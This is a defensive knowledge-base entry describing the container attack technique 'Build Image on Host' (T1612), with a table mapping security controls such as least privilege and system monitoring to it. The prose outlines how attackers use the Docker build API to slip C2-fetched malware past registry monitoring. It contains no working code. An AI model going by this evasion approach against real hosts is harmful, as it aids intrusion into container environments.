Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.(Citation: Aqua Build Images on Hosts) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name |
|---|---|---|---|---|
| AC-17 | Remote Access | Protects | T1612 | Build Image on Host |
| AC-2 | Account Management | Protects | T1612 | Build Image on Host |
| AC-3 | Access Enforcement | Protects | T1612 | Build Image on Host |
| AC-6 | Least Privilege | Protects | T1612 | Build Image on Host |
| CA-8 | Penetration Testing | Protects | T1612 | Build Image on Host |
| CM-6 | Configuration Settings | Protects | T1612 | Build Image on Host |
| CM-7 | Least Functionality | Protects | T1612 | Build Image on Host |
| RA-5 | Vulnerability Monitoring and Scanning | Protects | T1612 | Build Image on Host |
| SA-11 | Developer Testing and Evaluation | Protects | T1612 | Build Image on Host |
| SC-7 | Boundary Protection | Protects | T1612 | Build Image on Host |
| SI-4 | System Monitoring | Protects | T1612 | Build Image on Host |
| action.malware.variety.Unknown | Unknown | related-to | T1612 | Build Image on Host |